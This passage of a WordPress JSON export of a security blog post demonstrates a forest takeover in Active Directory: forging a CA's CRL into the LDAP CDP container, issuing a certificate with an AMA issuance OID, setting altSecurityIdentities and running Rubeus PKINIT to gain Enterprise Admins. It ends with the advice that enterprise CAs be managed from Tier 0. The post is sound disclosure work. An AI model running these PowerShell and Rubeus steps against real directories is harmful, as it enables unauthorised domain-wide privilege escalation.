style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Format(<\/span><span style=\"color: #22863A\">&quot;CN=CDP,CN=Public Key Services,CN=Services,{0}&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $Configuration)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;(objectClass=cRLDistributionPoint)&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchScope<\/span><span style=\"color: #24292EFF\">]::Subtree<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;objectClass&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$searchResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $ldap.SendRequest($searchRequest);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\"> ($searchResponse.Entries.Count <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">foreach<\/span><span style=\"color: #24292EFF\">($entry <\/span><span style=\"color: #D32F2F\">in<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\">($entry.DistinguishedName.StartsWith($CASubject<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.StringComparison<\/span><span style=\"color: #24292EFF\">]::CurrentCultureIgnoreCase))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPContainer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $entry.DistinguishedName.IndexOf(<\/span><span style=\"color: #22863A\">&#39;,&#39;<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #1976D2\">+1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $entry.DistinguishedName.Substring($CDPContainer)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\"> ($CDPLocation <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPContainer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">].DistinguishedName.IndexOf(<\/span><span style=\"color: #22863A\">&#39;,&#39;<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #1976D2\">+1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">].DistinguishedName.Substring($CDPContainer)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\">#Load the CRL created and signed earlier from file<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CrlBytes <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.IO.File<\/span><span style=\"color: #24292EFF\">]::ReadAllBytes(<\/span><span style=\"color: #22863A\">&quot;fakeca.crl&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$addRequest <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">AddRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Format(<\/span><span style=\"color: #22863A\">&quot;$CASubject,{0}&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $CDPLocation)<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">DirectoryAttribute<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;objectClass&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;cRLDistributionPoint&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">DirectoryAttribute<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;certificateRevocationList&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\">$CrlBytes)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$addResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $ldap.SendRequest($addRequest)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So now let&#8217;s issue a new certificate from our &#8216;FakeCA&#8217; that includes both the AMA Issuance Policy OID and the CDP extension pointing to an LDAP URI instead of HTTP.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Issue certificate with AMA extension and LDAP CDP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()\n$CRLDistInfo.Reset(1)\n$CRLDistInfo.SetNameCount(0, 1)\n$CRLDistInfo.SetNameEntry(0, 0, 7, &quot;ldap:\/\/\/CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint&quot;)\n$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)\n$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new(&quot;2.5.29.31&quot;, [Convert]::FromBase64String($CRLDistInfoB64), $false)\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso3'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    # $signer is the 'Fake CA' certificate with private key\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     '2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $CRLDistInfoExtManaged, $AmaExtension\n}\nNew-SelfSignedCertificate @params\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENClib.CCertEncodeCRLDistInfoClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.Reset(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameCount(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameEntry(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">7<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;ldap:\/\/\/CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoB64 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $CRLDistInfo.EncodeBlob([<\/span><span style=\"color: #D32F2F\">CERTENClib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_BASE64)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoExtManaged <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.Security.Cryptography.X509Certificates.X509Extension<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;2.5.29.31&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($CRLDistInfoB64)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - fakecaso3&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\"># $signer is the &#39;Fake CA&#39; certificate with private key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $CRLDistInfoExtManaged<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso3&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso3&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: #6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now perform PKINIT using the certificate with AMA Issuance OID and LDAP CDP from\/signed ny our  &#8216;Fake CA&#8217;  &#8211; nothing can stop us now.<\/p>\n\n\n\n<p>Use Rubeus to preform the PKIINIT and thanks to having the AMA Issuance OID we should be &#8216;Enterprise Admins&#8217; within the forest.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"rubeus asktgt \/user:CASO \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">rubeus asktgt <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">user:CASO <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">certificate:<\/span><span style=\"color: #D32F2F\">&lt;<\/span><span style=\"color: #24292EFF\">HASH<\/span><span style=\"color: #D32F2F\">&gt;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">enctype:aes256 <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">createnetonly:C:\\Windows\\System32\\<\/span><span style=\"color: #6F42C1\">cmd.exe<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">show<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1024x682.png\" alt=\"\" class=\"wp-image-1257\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1024x682.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-300x200.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-768x512.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1536x1023.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5.png 1600w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>All it required was altSecurityIdentities + AMA + Cert Publishers &#8211; a T1 admin that had access to a Enterprise CA in T1 and the ability to write to &#8216;altSecurityIdentities&#8217; to at least one user within the entire forest, and of course that AMA are being used to safeguard Enterprise Admins.<\/p>\n\n\n\n<p>So to summaries this: <strong>All Enterprise CAs within an Active Directory forest _must_ be managed from T0<\/strong>, otherwise escalation paths like the one just described can be accomplished &#8211; and just think about what we have done here &#8211; even if you&#8217;re not using AMA, there is still a Certificate Authority that is trusted on\/by all domain joined devices within the forest, you can create web-server certificates, code signing certs etc.<\/p>\n\n\n\n<p>Note all my demos uses \u2018<a href=\"https:\/\/github.com\/CarlSorqvist\/PsCertTools\/tree\/main\/CertReqTools\">CertRequestTools<\/a>\u2018 from Carl S\u00f6rqvist and in this case also\u00a0<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus\u00a0<\/a>from Will Schroeder.<\/p>\n\n\n\n<p>Credits to <a href=\"https:\/\/decoder.cloud\/2023\/11\/20\/a-deep-dive-in-cert-publishers-group\/\">&#8220;Decoder&#8217;s&#8221; blog<\/a> that bought this topic to the light, I have just proven it can be combined with AMA abuse to gain full control of the forest as well writing some sample code how to create a &#8216;Fake CA&#8217; in PowerShell.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Create, Distribute enforce Trust of a fake CA from T1 &#8211; PKINIT\u2013 altSecurityIdentities + AMA + Cert Publishers Let&#8217;s assume that &#8216;Issuing CA 2&#8217; here is managed from T1 and not trusted in &#8216;NTAuth&#8217; &#8211; should not be a problem or? In this scenario a Tier 1 administrator could logon to &#8216;Issuing CA 2&#8217; become &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/blog.chrisse.se\/?p=1247\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;When your Enterprise PKI becomes one of your enemies (Part 6)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[36],"tags":[32,39,40,30,31],"class_list":["post-1247","post","type-post","status-publish","format-standard","hentry","category-public-key-infrastructure-pki","tag-adcs","tag-ama","tag-fakeca","tag-pki","tag-sitr"],"_links":{"self":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1247"}],"version-history":[{"count":5,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247\/revisions"}],"predecessor-version":[{"id":1259,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247\/revisions\/1259"}],"wp:attachment":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}